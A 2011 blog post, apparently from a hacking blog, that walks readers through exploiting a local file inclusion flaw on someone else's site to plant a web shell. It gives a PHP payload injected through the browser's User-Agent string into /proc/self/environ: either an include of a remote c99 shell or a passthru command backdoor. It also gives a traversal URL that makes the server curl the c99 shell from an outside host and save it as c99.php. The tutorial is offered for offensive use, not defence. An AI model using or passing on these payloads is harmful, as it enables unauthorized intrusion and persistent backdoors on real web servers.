Uploading shell by using LFI

Posted: February 25, 2011 by Hacking & Relax in Skill

================================
Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox…
================================

So… first you find some site vuln to lfi… now we must check if there are logs…
They are usually stored in /proc/self/environ… so just replace /etc/passwd with /proc/self/environ

If you get something like “DOCUMENT_ROOT=…” then it means you sucessfully found logs 

Now,on that page you can find something like “HTTP_USER_AGENT”…
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it… but how?

Open a new tab in Mozilla,and type “about :config” (without quotes)…

Now,in “Filter” type: general.useragent.extra.firefox

You will get something like this:

Code:
Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7

Now,double click on general.useragent.extra.firefox and replace “Firefox/3.0.7”
with

Code:
<? include("http://shelladdress.com/c99.txt"); ?>

If everything is good you will get shell included… Otherwise,you will get errors… Mostly I was getting error “URL-File access disabled” or something like that… but using php I found another way…

Instead of typing

Code:
<? include("http://shelladdress.com/c99.txt"); ?>

as useragent,type this:

Code:
<? passthru($_GET['cmd']); ?>

Then load your vuln page like this:

Code:
http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ%00?cmd=curl http://shelladress.com/c99.txt -o c99.php

So,lets review… basicaly,you are just adding &cmd= thing at the end of url…

Now,using “curl” command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php…

Now simply go to your site like this:

Code:
http://yourvulnsite.com/c99.php

And that’s all…

Enjoy,if I helped you,hit the thanks button…]

 

Advertisements
Comments
  1. rlngs4 says:

    if we get nothing when trying /proc/self/environ !

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s